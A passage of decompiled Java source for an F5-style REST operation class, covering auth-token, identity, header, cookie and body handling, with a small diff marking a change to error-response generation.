RestOperation create() {\n RestOperation self = new RestOperation();\n self.restOperationFlags = EnumSet.noneOf(RestOperationFlags.class);\n return self;\n }\n \n \n \n \n \n \n \n \n \n \n public static RestOperation createIdentified() {\n RestOperation self = create();\n \n \n self.restOperationFlags.add(RestOperationFlags.IDENTIFIED);\n \n return self;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n public static RestOperation createIdentified(RestOperation original) {\n RestOperation copy = (RestOperation)original.clone();\n \n \n copy.restOperationFlags.clear();\n \n \n copy.restOperationFlags.add(RestOperationFlags.IDENTIFIED);\n \n return copy.setXF5AuthToken(null);\n }\n \n \n \n \n \n \n \n \n \n \n \n public static RestOperation createIdentified(String identifiedGroupName) {\n RestOperation self = createIdentified();\n self.identifiedGroupName = identifiedGroupName;\n return self;\n }\n \n \n \n \n public static RestOperation createSigned() {\n return create();\n }\n \n \n \n \n \n \n \n public static RestOperation createSignedAndVerified() {\n RestOperation self = create();\n self.restOperationFlags.add(RestOperationFlags.VERIFIED);\n return self;\n }\n \n \n \n \n private static class AuthorizationData\n {\n public String basicAuthValue;\n \n \n \n public String xAuthToken;\n \n \n \n public AuthTokenItemState xF5AuthTokenState;\n \n \n public String wwwAuthenticate;\n \n \n \n private AuthorizationData() {}\n }\n \n \n \n private static class IdentityData\n {\n public String userName;\n \n \n public RestReference userReference;\n \n \n public RestReference[] groupReferences;\n \n \n \n private IdentityData() {}\n }\n \n \n private final HashMap<String, String> parameters = new HashMap<>();\n \n \n \n \n private HttpHeaderFields[] additionalHeaders;\n \n \n \n private static AtomicLong nextId = new AtomicLong(0L);\n \n private final long id;\n \n private URI uri;\n \n private Date expiration = new Date(RestHelper.getCurrentTimeInMillis() + RestHelper.getOperationTimeoutMillis());\n \n \n private RestMethod method;\n \n \n private String incomingContentType;\n \n \n private String contentType;\n \n private String contentEncoding;\n \n private String accept;\n \n private String body;\n \n private byte[] binaryBody;\n \n private long contentLength = -1L;\n \n \n private String contentRange;\n \n \n private Object deserializedBody;\n \n \n private Type deserializedBodyType;\n \n \n private boolean isResponse;\n \n \n private boolean isForceSocketEnabled;\n \n private boolean isConnectionKeepAlive = true;\n \n private boolean isConnectionCloseRequested;\n \n private EnumSet<RestOperationFlags> restOperationFlags;\n \n private String xForwardedFor;\n \n private int retriesRemaining = 5;\n \n private final AtomicInteger completionCount = new AtomicInteger(0);\n \n private int httpHeaderByteCount;\n \n private int statusCode = 200;\n \n \n private AuthorizationData authorizationData;\n \n \n private IdentityData identityData;\n \n \n private String transferEncoding;\n \n \n private List<ParsedCollectionEntry> parsedUriCollectionEntries;\n \n \n private SocketAddress sourceAddress;\n \n \n private String referer;\n \n \n private String coordinationId;\n \n \n private boolean isRollbackRequest;\n \n \n private String contentDisposition;\n \n \n private String identifiedGroupName;\n \n \n private boolean isTrustedRequest;\n \n \n private String allow;\n \n \n private Boolean resourceDeprecated;\n \n \n private Boolean resourceEarlyAccess;\n \n \n private Boolean propertyDeprecated;\n \n \n private Boolean propertyEarlyAccess;\n \n \n private long xF5ConfigApiStatus;\n \n \n private String origin;\n \n private String senderNote;\n \n private String gossipHeader;\n \n private static final int DEFAULT_HEADER_BUFFER_SIZE = 256;\n \n private StringBuilder responseHeadersTrace;\n \n private volatile StringBuilder requestHeadersTrace;\n \n private boolean isRestErrorResponseRequired = true;\n \n private Boolean isPublicRequest;\n \n \n public void setIsPublicRequestToTrue() {\n this.isPublicRequest = Boolean.TRUE;\n }\n \n \n \n \n \n \n public boolean isPublicRequest() {\n return (this.isPublicRequest != null && this.isPublicRequest.booleanValue());\n }\n \n \n \n \n \n \n \n public void appendResponseHeaderTrace(String headerLine) {\n if (RestHelper.getOperationTracingLevel().intValue() > Level.FINER.intValue()) {\n return;\n }\n \n if (this.responseHeadersTrace == null) {\n this.responseHeadersTrace = new StringBuilder(256);\n }\n this.responseHeadersTrace.append(headerLine);\n }\n \n \n \n \n \n \n \n \n \n public void appendRequestHeaderTrace(String headerName, String headerValue) {\n if (RestHelper.getOperationTracingLevel().intValue() > Level.FINER.intValue()) {\n return;\n }\n \n if (this.requestHeadersTrace == null) {\n this.requestHeadersTrace = new StringBuilder(256);\n }\n appendHeaderTrace(this.requestHeadersTrace, headerName, headerValue);\n }\n \n \n private void appendHeaderTrace(StringBuilder headersTraceBuilder, String headerName, String headerValue) {\n headersTraceBuilder.append(headerName);\n headersTraceBuilder.append(\": \");\n headersTraceBuilder.append(headerValue);\n headersTraceBuilder.append(\"\\n\");\n }\n \n \n \n \n \n \n \n \n public String getResponseHeadersTrace() {\n return (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue() && this.responseHeadersTrace != null) ? this.responseHeadersTrace.toString() : null;\n }\n \n \n \n \n \n \n \n \n \n \n public String getRequestHeadersTrace() {\n return (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue() && this.requestHeadersTrace != null) ? this.requestHeadersTrace.toString() : null;\n }\n \n \n private RestOperation() {\n this.id = nextId.getAndIncrement();\n }\n \n \n \n public String toString() {\n return String.format(\"[\\n id=%s\\n referer=%s\\n uri=%s\\n method=%s\\n statusCode=%d\\n contentType=%s\\n contentLength=%d\\n contentRange=%s\\n deadline=%s\\n body=%s\\n forceSocket=%s\\n isResponse=%s\\n retriesRemaining=%s\\n coordinationId=%s\\n isConnectionCloseRequested=%s\\n isConnectionKeepAlive=%s\\n isRestErrorResponseRequired=%s\\n AdditionalHeadersAsString=\\n%s\\n ResponseHeadersTrace=%s\\n X-F5-Config-Api-Status=%d]\", new Object[] { Long.valueOf(this.id), this.referer, this.uri, getMethod(), Integer.valueOf(getStatusCode()), getContentType(), Long.valueOf(getContentLength()), getContentRange(), getExpiration(), getBodyAsString(), Boolean.valueOf(getForceSocket()), Boolean.valueOf(isResponse()), Integer.valueOf(getRetriesRemaining()), getCoordinationId(), Boolean.valueOf(isConnectionCloseRequested()), Boolean.valueOf(isConnectionKeepAlive()), Boolean.valueOf(isRestErrorResponseRequired()), getAdditionalHeadersAsString(\" \"), (getResponseHeadersTrace() == null) ? \"\" : String.format(\" %s\\n\", new Object[] { getResponseHeadersTrace() }), Long.valueOf(getXF5ConfigApiStatus()) });\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public long getId() {\n return this.id;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public String getReferer() {\n return this.referer;\n }\n \n \n \n \n \n \n public RestOperation setReferer(String referer) {\n this.referer = referer;\n return this;\n }\n \n \n \n \n public RestOperation setOneTryOnly() {\n this.retriesRemaining = 1;\n return this;\n }\n \n \n \n \n int decrementRetriesRemaining() {\n return --this.retriesRemaining;\n }\n \n \n \n \n int getRetriesRemaining() {\n return this.retriesRemaining;\n }\n \n \n \n \n \n \n \n \n \n void setRetriesRemaining(int retriesRemaining) {\n this.retriesRemaining = retriesRemaining;\n }\n \n \n \n \n RestOperation clearRetriesRemaining() {\n this.retriesRemaining = 0;\n return this;\n }\n \n \n \n \n \n \n public int getCompletionCount() {\n return this.completionCount.get();\n }\n \n \n \n \n void resetCompletionCount() {\n this.completionCount.set(0);\n }\n \n \n \n \n public String getXForwarderdFor() {\n return this.xForwardedFor;\n }\n \n \n \n \n \n public String getRemoteSender() {\n if (this.xForwardedFor != null) {\n return this.xForwardedFor;\n }\n \n if (this.referer != null) {\n return this.referer;\n }\n return \"Unknown\";\n }\n \n \n \n \n public RestOperation setContentLength(long contentLength) {\n this.contentLength = contentLength;\n return this;\n }\n \n \n \n \n public RestRequestCompletion getCompletion() {\n return this.completion;\n }\n \n \n \n \n public boolean isConnectionKeepAlive() {\n return this.isConnectionKeepAlive;\n }\n \n \n \n \n \n \n \n public RestOperation setConnectionKeepAlive(boolean isConnectionKeepAlive) {\n this.isConnectionKeepAlive = isConnectionKeepAlive;\n return this;\n }\n \n \n \n \n public boolean isConnectionCloseRequested() {\n return this.isConnectionCloseRequested;\n }\n \n \n \n \n \n \n \n \n \n public RestOperation setConnectionClose(boolean isConnectionCloseRequested) {\n this.isConnectionCloseRequested = isConnectionCloseRequested;\n return this;\n }\n \n \n \n \n int getHttpHeaderByteCount() {\n return this.httpHeaderByteCount;\n }\n \n \n \n \n RestOperation setHttpHeaderByteCount(int byteCount) {\n this.httpHeaderByteCount = byteCount;\n return this;\n }\n \n \n \n \n RestOperation flipToResponse(boolean clearBody) {\n removeAdditionalHeader(\"Tmui-Dubbuf\");\n \n this.isResponse = true;\n this.parameters.clear();\n this.httpHeaderByteCount = 0;\n \n if (this.authorizationData != null) {\n this.authorizationData.basicAuthValue = null;\n }\n if (clearBody) {\n clearBody();\n }\n return this;\n }\n \n \n \n \n void clearBody() {\n this.contentLength = -1L;\n this.binaryBody = null;\n this.body = null;\n this.deserializedBody = null;\n this.deserializedBodyType = null;\n }\n \n public boolean isResponse() {\n return this.isResponse;\n }\n \n public RestOperation setForceSocket(boolean forceSocket) {\n this.isForceSocketEnabled = forceSocket;\n return this;\n }\n \n public boolean getForceSocket() {\n return this.isForceSocketEnabled;\n }\n \n public RestOperation setCompletion(RestRequestCompletion completion) {\n this.completion = completion;\n return this;\n }\n \n public RestOperation setMethod(RestMethod method) {\n this.method = method;\n return this;\n }\n \n public RestMethod getMethod() {\n return this.method;\n }\n \n public RestOperation setContentDisposition(String contentDisposition) {\n this.contentDisposition = contentDisposition;\n return this;\n }\n \n public String getContentDisposition() {\n return this.contentDisposition;\n }\n \n public RestOperation setContentType(String contentType) {\n this.incomingContentType = null;\n this.contentType = contentType;\n return this;\n }\n \n public RestOperation setIncomingContentType(String contentType) {\n this.incomingContentType = contentType;\n this.contentType = null;\n return this;\n }\n \n public RestOperation defaultToContentTypeJson() {\n return setContentType(\"application/json\");\n }\n \n public String getContentType() {\n return (this.contentType == null) ? this.incomingContentType : this.contentType;\n }\n \n public String getOutgoingContentType() {\n return this.contentType;\n }\n \n public String getOutgoingContentEncoding() {\n if (this.contentEncoding != null) {\n return this.contentEncoding;\n }\n \n if (this.contentEncoding == null && this.contentType.equals(\"application/json\")) {\n return MIME_ENCODING_UTF8;\n }\n return null;\n }\n \n public RestOperation setContentRange(String contentRange) {\n this.contentRange = contentRange;\n if (this.contentRange != null) {\n this.contentRange = this.contentRange.trim();\n }\n return this;\n }\n \n public String getContentRange() {\n if (this.contentRange == null) {\n return null;\n }\n return this.contentRange.trim();\n }\n \n \n \n \n \n \n \n public String getAccept() {\n return this.accept;\n }\n \n \n \n \n \n \n public RestOperation setAccept(String accept) {\n this.accept = accept;\n return this;\n }\n \n private void setupAuthorizationData() {\n if (this.authorizationData == null) {\n this.authorizationData = new AuthorizationData();\n }\n }\n \n \n \n \n \n \n \n \n \n public void setBasicAuthFromIdentity() {\n if (this.authorizationData == null) {\n return;\n }\n \n this.authorizationData.basicAuthValue = AuthzHelper.encodeBasicAuth(getAuthUser(), null);\n }\n \n \n \n \n \n \n \n \n \n \n \n public RestOperation setBasicAuthorizationHeader(String value) {\n setupAuthorizationData();\n \n \n if (value != null) {\n byte[] data = DatatypeConverter.parseBase64Binary(value);\n if (data == null || data.length == 0) {\n LOGGER.warningFmt(\"Basic Authorization header set to value that is invalid base64. Value: %s\", new Object[] { value });\n \n value = null;\n }\n }\n \n this.authorizationData.basicAuthValue = value;\n return this;\n }\n \n \n \n \n \n public RestOperation setBasicAuthorization(Void dummy) {\n if (this.authorizationData != null) {\n this.authorizationData.basicAuthValue = null;\n }\n return this;\n }\n \n \n \n \n \n \n \n public RestOperation setBasicAuthorization(String user, String password) {\n setIdentityData(user, null, null);\n setBasicAuthorizationHeader(AuthzHelper.encodeBasicAuth(user, password));\n return this;\n }\n \n \n \n \n \n public RestOperation setAdminIdentity() {\n RestReference adminReference = AuthzHelper.getDefaultAdminReference();\n if (adminReference != null) {\n setIdentityData(null, adminReference, null);\n }\n return this;\n }\n \n \n \n \n \n \n public RestOperation setIdentityFrom(RestOperation incomingRequest) {\n this.identityData = null;\n if (incomingRequest.identityData != null) {\n setIdentityData(incomingRequest.identityData.userName, incomingRequest.identityData.userReference, incomingRequest.identityData.groupReferences);\n }\n \n \n this.authorizationData = null;\n if (incomingRequest.authorizationData != null) {\n this.authorizationData = new AuthorizationData();\n this.authorizationData.basicAuthValue = incomingRequest.authorizationData.basicAuthValue;\n }\n \n return this;\n }\n \n \n \n \n \n \n \n public RestOperation setIdentityData(String userName, RestReference userReference, RestReference[] groupReferences) {\n if (userName == null && !RestReference.isNullOrEmpty(userReference)) {\n \n \n String segment = UrlHelper.getLastPathSegment(userReference.link);\n if (userReference.link.equals(UrlHelper.buildPublicUri(UrlHelper.buildUriPath(new String[] { WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH, segment }))))\n {\n userName = segment;\n }\n }\n if (userName != null && RestReference.isNullOrEmpty(userReference)) {\n userReference = new RestReference(UrlHelper.buildPublicUri(UrlHelper.buildUriPath(new String[] { WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH, userName })));\n }\n \n \n this.identityData = new IdentityData();\n this.identityData.userName = userName;\n this.identityData.userReference = userReference;\n this.identityData.groupReferences = groupReferences;\n return this;\n }\n \n \n \n \n \n public String getBasicAuthorization() {\n if (this.authorizationData == null) {\n return null;\n }\n return this.authorizationData.basicAuthValue;\n }\n \n \n \n \n \n \n \n public RestOperation setWwwAuthenticate(String authentication) {\n setupAuthorizationData();\n this.authorizationData.wwwAuthenticate = authentication;\n return this;\n }\n \n \n \n \n \n \n public RestOperation setXF5AuthToken(String token) {\n setupAuthorizationData();\n if (token == null) {\n this.authorizationData.xF5AuthTokenState = null;\n } else {\n this.authorizationData.xF5AuthTokenState = new AuthTokenItemState();\n this.authorizationData.xF5AuthTokenState.token = token;\n }\n return this;\n }\n \n \n \n \n \n \n \n \n \n public RestOperation setXF5AuthTokenState(AuthTokenItemState tokenState) {\n setupAuthorizationData();\n this.authorizationData.xF5AuthTokenState = tokenState;\n \n RestOperationIdentifier.updateIdentityFromAuthenticationData(this);\n \n return this;\n }\n \n \n \n \n public RestOperation setXAuthToken(String token) {\n setupAuthorizationData();\n this.authorizationData.xAuthToken = token;\n return this;\n }\n \n \n \n \n public RestOperation setXForwardedFor(String xForwardedFor) {\n this.xForwardedFor = xForwardedFor;\n return this;\n }\n \n \n \n \n \n \n public String getWwwAuthenticate() {\n if (this.authorizationData == null) {\n return null;\n }\n return this.authorizationData.wwwAuthenticate;\n }\n \n \n \n \n \n \n \n public String getXF5AuthToken() {\n if (this.authorizationData == null || this.authorizationData.xF5AuthTokenState == null) {\n return null;\n }\n return this.authorizationData.xF5AuthTokenState.token;\n }\n \n \n \n \n \n public AuthTokenItemState getXF5AuthTokenState() {\n if (this.authorizationData == null) {\n return null;\n }\n return this.authorizationData.xF5AuthTokenState;\n }\n \n \n \n \n \n public String getXAuthToken() {\n if (this.authorizationData == null) {\n return null;\n }\n return this.authorizationData.xAuthToken;\n }\n \n public RestOperation setTransferEncoding(String value) {\n this.transferEncoding = value;\n return this;\n }\n \n public String getTransferEncoding() {\n return this.transferEncoding;\n }\n \n \n \n \n \n public String getAuthUser() {\n return (this.identityData == null) ? null : this.identityData.userName;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public boolean doesRequireAuthorization() {\n return (isPublicRequest() || getAuthUser() != null);\n }\n \n \n \n \n \n \n \n \n \n public RestReference getAuthUserReference() {\n return (this.identityData == null) ? null : this.identityData.userReference;\n }\n \n \n \n \n \n \n \n public RestReference[] getAuthGroupReferences() {\n return (this.identityData == null) ? null : this.identityData.groupReferences;\n }\n \n \n \n \n \n \n public List<RestReference> getAuthGroupReferencesList() {\n List<RestReference> list = new ArrayList<>();\n \n if (this.identityData == null) {\n return list;\n }\n \n if (this.identityData.groupReferences == null) {\n return list;\n }\n \n for (RestReference reference : this.identityData.groupReferences) {\n if (!RestReference.isNullOrEmpty(reference)) {\n list.add(reference);\n }\n }\n \n return list;\n }\n \n \n \n \n \n \n \n public List<RestReference> getAuthIdentityReferences() {\n List<RestReference> list = new ArrayList<>();\n \n if (this.identityData == null) {\n return list;\n }\n \n list.addAll(getAuthGroupReferencesList());\n \n if (!RestReference.isNullOrEmpty(this.identityData.userReference)) {\n list.add(this.identityData.userReference);\n }\n \n return list;\n }\n \n \n \n public String getAuthProviderName() {\n AuthTokenItemState token = getXF5AuthTokenState();\n if (token != null) {\n return token.authProviderName;\n }\n \n \n return \"local\";\n }\n \n public long getContentLength() {\n if (this.contentLength == -1L && this.body == null)\n {\n \n getBodyAsString();\n }\n return this.contentLength;\n }\n \n \n \n \n \n \n \n \n public boolean isContentLengthUnknown() {\n return (this.contentLength == -1L);\n }\n \n \n \n \n \n \n public boolean isBodyNull() {\n return (this.body == null && this.binaryBody == null);\n }\n \n \n \n \n public boolean isBodyEmpty() {\n if (isBodyNull())\n {\n return true;\n }\n \n if (this.binaryBody != null && this.binaryBody.length > 0)\n {\n return false;\n }\n \n if (this.body != null && (\n this.body.isEmpty() || \"{}\".equals(this.body))) {\n return true;\n }\n \n \n \n return (isContentLengthUnknown() || getContentLength() == 0L);\n }\n \n \n public <T> T getTypedBody(Class<T> bodyClass) {\n return bodyClass.cast(getBody(bodyClass));\n }\n \n public Object getBody(Type bodyType) {\n if (isBodyEmpty()) {\n return null;\n }\n if (this.deserializedBody != null && this.deserializedBodyType != null && bodyType.equals(this.deserializedBodyType))\n {\n \n return this.deserializedBody;\n }\n \n this.deserializedBody = gson.fromJson(this.body, bodyType);\n this.deserializedBodyType = bodyType;\n return this.deserializedBody;\n }\n \n public String getBodyAsString() {\n return this.body;\n }\n \n public byte[] getBinaryBody() {\n return this.binaryBody;\n }\n \n public RestOperation setBinaryBody(byte[] binaryBody) {\n return setBody(null, null, binaryBody);\n }\n \n public RestOperation setBinaryBody(byte[] binaryBody, String contentType) {\n setBody(null, null, binaryBody);\n return setContentType(contentType);\n }\n \n \n \n \n \n \n \n \n \n \n public RestOperation setBodyFromOp(RestOperation request) {\n this.body = request.body;\n this.binaryBody = request.binaryBody;\n \n this.contentLength = request.contentLength;\n this.contentType = request.contentType;\n this.deserializedBody = null;\n this.deserializedBodyType = null;\n \n return this;\n }\n \n \n \n \n \n \n public RestOperation setParsedBody(JsonElement body) {\n return setBody(null, body, null);\n }\n \n public RestOperation setBody(String body, String mimeType) {\n return setBody(body, null, null).setContentType(mimeType);\n }\n \n public RestOperation setBody(String body) {\n return setBody(body, null, null);\n }\n \n public RestOperation setBody(Object body) {\n return setBody(null, body, null);\n }\n \n \n private RestOperation setBody(String stringBody, Object aObjBody, byte[] aBinaryBody) {\n clearBody();\n \n if (stringBody != null) {\n \n this.body = stringBody;\n this.contentLength = stringBody.length();\n \n }\n else if (aObjBody != null) {\n \n \n this.body = toJson(aObjBody);\n this.contentLength = this.body.length();\n \n \n setContentType(\"application/json\");\n } else if (aBinaryBody != null) {\n \n this.binaryBody = aBinaryBody;\n this.contentLength = aBinaryBody.length;\n }\n \n \n \n checkSize(this.contentLength);\n \n return this;\n }\n public void checkSize(long requiredCapacity) {\n int maxSize = maxMessageBodySize.get();\n if (requiredCapacity > maxSize) {\n throw new IllegalArgumentException(\"Message body size of \" + requiredCapacity + \" bytes\" + \" exceeds the maximum allowed size of \" + maxSize + \" bytes\");\n }\n }\n \n \n \n \n \n \n \n \n \n public JsonElement getParsedBody() {\n if (this.body == null) {\n return null;\n }\n \n return toJsonTree(this.body);\n }\n \n \n \n \n \n \n \n public boolean hasProperty(String propertyName) {\n if (this.binaryBody != null) {\n return false;\n }\n \n if (!\"application/json\".equals(this.contentType)) {\n return false;\n }\n \n if (this.body == null) {\n return false;\n }\n \n if (!this.body.contains(\"\\\"\" + propertyName + \"\\\"\")) {\n return false;\n }\n \n JsonElement parsedBody = getParsedBody();\n if (parsedBody.isJsonObject()) {\n JsonObject bodyObj = parsedBody.getAsJsonObject();\n return bodyObj.has(propertyName);\n }\n \n return false;\n }\n \n \n \n \n public RestOperation setUri(URI uri) {\n this.uri = uri;\n HttpParserHelper.parseUriParameters(this, uri);\n return this;\n }\n \n public URI getUri() {\n return this.uri;\n }\n \n public RestOperation setStatusCode(int statusCode) {\n this.statusCode = statusCode;\n return this;\n }\n \n public int getStatusCode() {\n return this.statusCode;\n }\n \n \n \n \n \n \n \n \n \n \n public final RestOperation setExpiration(Date expiration) {\n if (expiration == null) {\n throw new IllegalArgumentException(\"expiration may not be null\");\n }\n this.expiration = expiration;\n return this;\n }\n \n \n \n \n \n public final Date getExpiration() {\n return this.expiration;\n }\n \n \n \n \n \n public boolean hasExpired() {\n return hasExpired(new Date());\n }\n \n \n \n \n \n \n public boolean hasExpired(Date now) {\n if (this.expiration.after(now)) {\n return false;\n }\n return true;\n }\n \n public Map<String, String> getParameters() {\n return this.parameters;\n }\n \n public RestOperation setParameter(String name, String value) {\n RestHelper.setKeyValuePair(this.parameters, name, value);\n return this;\n }\n \n public String getParameter(String name) {\n return this.parameters.get(name);\n }\n \n public void removeParameter(String name) {\n this.parameters.remove(name);\n }\n \n \n \n \n \n \n \n public void setCookies(Map<String, String> cookies) {\n setCookies(cookies, Direction.getDirection(this.isResponse));\n }\n \n \n \n \n \n \n \n \n public void setCookies(Map<String, String> cookies, Direction direction) {\n StringBuilder sb = new StringBuilder();\n for (Map.Entry<String, String> cookie : cookies.entrySet())\n {\n \n sb.append(((String)cookie.getKey()).trim()).append(\"=\").append(cookie.getValue()).append(\";\");\n }\n \n \n \n \n addAdditionalHeader(direction, \"Cookie\", sb.toString());\n }\n \n \n \n \n \n \n \n public Map<String, String> getCookies() {\n return getCookies(Direction.getDirection(this.isResponse));\n }\n \n \n \n \n \n \n \n \n \n public Map<String, String> getCookies(Direction direction) {\n HashMap<String, String> cookieMap = new HashMap<>();\n \n String cookies = getAdditionalHeader(direction, \"Cookie\");\n if (cookies != null) {\n HttpParserHelper.parseRequestKeyValuePairs(cookies, cookieMap, \";\");\n }\n \n \n \n \n \n \n Map<String, String> trimmedCookies = new HashMap<>();\n for (String key : cookieMap.keySet()) {\n String trimmedKey = key.trim();\n String value = cookieMap.get(key);\n String trimmedValue = value.trim();\n trimmedCookies.put(trimmedKey, trimmedValue);\n }\n \n return trimmedCookies;\n }\n \n \n \n \n \n \n \n \n \n public RestOperation setCookie(String name, String value) {\n return setCookie(name, value, Direction.getDirection(this.isResponse));\n }\n \n \n \n \n \n \n \n \n \n \n public RestOperation setCookie(String name, String value, Direction direction) {\n Map<String, String> cookies = getCookies(direction);\n RestHelper.setKeyValuePair(cookies, name, value);\n setCookies(cookies, direction);\n \n return this;\n }\n \n \n \n \n \n \n \n public String getCookie(String name) {\n return getCookie(name, Direction.getDirection(this.isResponse));\n }\n \n \n \n \n \n \n \n \n public String getCookie(String name, Direction direction) {\n Map<String, String> cookies = getCookies(direction);\n \n if (cookies != null) {\n return cookies.get(name);\n }\n return null;\n }\n \n \n \n \n private void allocateHttpHeaders() {\n if (this.additionalHeaders == null) {\n this.additionalHeaders = new HttpHeaderFields[2];\n }\n }\n \n \n \n \n \n \n \n public HttpHeaderFields getAdditionalHeaders() {\n allocateHttpHeaders();\n return this.additionalHeaders[responseToIndex()];\n }\n \n \n \n \n \n \n \n public HttpHeaderFields getAdditionalHeaders(Direction specificDirection) {\n allocateHttpHeaders();\n if (this.additionalHeaders[specificDirection.getIndex()] == null) {\n this.additionalHeaders[specificDirection.getIndex()] = new HttpHeaderFields();\n }\n return this.additionalHeaders[specificDirection.getIndex()];\n }\n \n \n \n \n \n \n \n public String getAdditionalHeader(String name) {\n allocateHttpHeaders();\n if (this.additionalHeaders[responseToIndex()] == null) {\n this.additionalHeaders[responseToIndex()] = new HttpHeaderFields();\n }\n return getAdditionalHeader(Direction.getDirection(this.isResponse), name);\n }\n \n \n \n \n \n \n \n public String getAdditionalHeader(Direction specificDirection, String name) {\n allocateHttpHeaders();\n if (this.additionalHeaders[specificDirection.getIndex()] == null) {\n return \"\";\n }\n \n return this.additionalHeaders[specificDirection.getIndex()].getHeaderField(name);\n }\n \n \n \n \n \n \n \n public void addAdditionalHeaders(Direction specificDirection, HttpHeaderFields headers) {\n this.additionalHeaders[specificDirection.getIndex()] = headers;\n }\n \n \n \n \n \n \n \n public void addAdditionalHeader(Direction specificDirection, String name, String value) {\n allocateHttpHeaders();\n if (this.additionalHeaders[specificDirection.getIndex()] == null) {\n this.additionalHeaders[specificDirection.getIndex()] = new HttpHeaderFields();\n }\n \n this.additionalHeaders[specificDirection.getIndex()].addHeaderField(name, value, specificDirection.toString());\n }\n \n \n \n \n \n \n \n \n public String removeAdditionalHeader(String name) {\n return removeAdditionalHeader(Direction.getDirection(this.isResponse), name);\n }\n \n \n \n \n \n \n \n \n public String removeAdditionalHeader(Direction specificDirection, String name) {\n allocateHttpHeaders();\n if (this.additionalHeaders[specificDirection.getIndex()] == null) {\n return \"\";\n }\n \n return this.additionalHeaders[specificDirection.getIndex()].removeHeaderField(name);\n }\n \n \n \n \n \n \n \n public void addAdditionalHeader(String name, String value) {\n addAdditionalHeader(Direction.getDirection(this.isResponse), name, value);\n }\n \n \n \n \n \n \n private String getAdditionalHeadersAsString(String linePrefix) {\n allocateHttpHeaders();\n StringBuilder sb = new StringBuilder(linePrefix + \"Request:\");\n if (this.additionalHeaders[Direction.REQUEST.getIndex()] == null) {\n sb.append(\"<empty>\");\n } else {\n sb.append(this.additionalHeaders[Direction.REQUEST.getIndex()].getAdditionalHeadersAsString(linePrefix));\n }\n \n sb.append(linePrefix + \"Response:\");\n if (this.additionalHeaders[Direction.RESPONSE.getIndex()] == null) {\n sb.append(\"<empty>\");\n } else {\n sb.append(this.additionalHeaders[Direction.RESPONSE.getIndex()].getAdditionalHeadersAsString(linePrefix));\n }\n \n \n return sb.toString();\n }\n \n \n \n \n public enum Direction\n {\n REQUEST(false),\n \n RESPONSE(true);\n \n private int index;\n \n private String name;\n \n Direction(boolean isResponse) {\n this.index = isResponse ? 1 : 0;\n this.name = isResponse ? \"response\" : \"request\";\n }\n \n public int getIndex() {\n return this.index;\n }\n \n \n public String toString() {\n return this.name;\n }\n \n public static Direction getDirection(boolean isResponse) {\n return isResponse ? RESPONSE : REQUEST;\n }\n \n public static Direction opposite(Direction direction) {\n return (direction == RESPONSE) ? REQUEST : RESPONSE;\n }\n }\n \n private int responseToIndex() {\n return Direction.getDirection(this.isResponse).getIndex();\n }\n \n public RestOperation setCoordinationId(String value) {\n this.coordinationId = value;\n return this;\n }\n \n public String getCoordinationId() {\n return this.coordinationId;\n }\n \n public RestOperation setAllow(String value) {\n this.allow = value;\n return this;\n }\n \n public String getAllow() {\n return this.allow;\n }\n \n public RestOperation setResourceDeprecated(Boolean value) {\n this.resourceDeprecated = value;\n return this;\n }\n \n public Boolean getResourceDeprecated() {\n return Boolean.valueOf((this.resourceDeprecated != null && this.resourceDeprecated.booleanValue()));\n }\n \n public RestOperation setResourceEarlyAccess(Boolean value) {\n this.resourceEarlyAccess = value;\n return this;\n }\n \n public Boolean getResourceEarlyAccess() {\n return Boolean.valueOf((this.resourceEarlyAccess != null && this.resourceEarlyAccess.booleanValue()));\n }\n \n public RestOperation setPropertyDeprecated(Boolean value) {\n this.propertyDeprecated = value;\n return this;\n }\n \n public Boolean getPropertyDeprecated() {\n return Boolean.valueOf((this.propertyDeprecated != null && this.propertyDeprecated.booleanValue()));\n }\n \n public RestOperation setPropertyEarlyAccess(Boolean value) {\n this.propertyEarlyAccess = value;\n return this;\n }\n \n public Boolean getPropertyEarlyAccess() {\n return Boolean.valueOf((this.propertyEarlyAccess != null && this.propertyEarlyAccess.booleanValue()));\n }\n \n public boolean containsApiStatusInformation() {\n return (getResourceDeprecated().booleanValue() || getResourceEarlyAccess().booleanValue() || getPropertyDeprecated().booleanValue() || getPropertyEarlyAccess().booleanValue());\n }\n \n \n public void setXF5ConfigApiStatus(long bitMask) {\n this.xF5ConfigApiStatus = bitMask;\n }\n \n public long getXF5ConfigApiStatus() {\n return this.xF5ConfigApiStatus;\n }\n \n public RestOperation setOrigin(String value) {\n this.origin = value;\n return this;\n }\n \n public String getOrigin() {\n return this.origin;\n }\n \n public List<ParsedCollectionEntry> getParsedCollectionEntries() {\n return this.parsedUriCollectionEntries;\n }\n \n \n \n \n \n \n EnumSet<RestOperationFlags> getRestOperationFlags() {\n return this.restOperationFlags;\n }\n \n public void setSourceAddress(SocketAddress sourceAddress) {\n this.sourceAddress = sourceAddress;\n }\n \n public SocketAddress getSourceAddress() {\n return this.sourceAddress;\n }\n \n \n \n \n public boolean isRollbackRequest() {\n return this.isRollbackRequest;\n }\n \n \n \n \n public RestOperation setRollbackRequest(boolean isRollback) {\n this.isRollbackRequest = isRollback;\n return this;\n }\n \n \n \n \n public RestOperation setParsedCollectionEntries(List<ParsedCollectionEntry> parsedList) {\n this.parsedUriCollectionEntries = parsedList;\n return this;\n }\n \n \n \n \n \n \n \n +\n public boolean generateRestErrorResponse() {\n - return ((getContentType() == null || getContentType().contains(\"application/json\")) && isRestErrorResponseRequired());\n + return (getContentType() != null && isRestErrorResponseRequired());\n }\n \n \n \n \n \n \n \n -\n public boolean isRestErrorResponseRequired() {\n return this.isRestErrorResponseRequired;\n }\n \n \n \n \n \n public RestOperation setIsRestErrorResponseRequired(boolean isRestErrorResponseRequired) {\n this.isRestErrorResponseRequired = isRestErrorResponseRequired;\n return this;\n }\n \n \n \n \n public String getIdentifiedGroupName() {\n return this.identifiedGroupName;\n }\n \n \n \n \n protected RestOperation setTrustedRequest(boolean value) {\n this.isTrustedRequest = value;\n return this;\n }\n \n \n \n \n \n \n public boolean isTrustedRequest() {\n return this.isTrustedRequest;\n 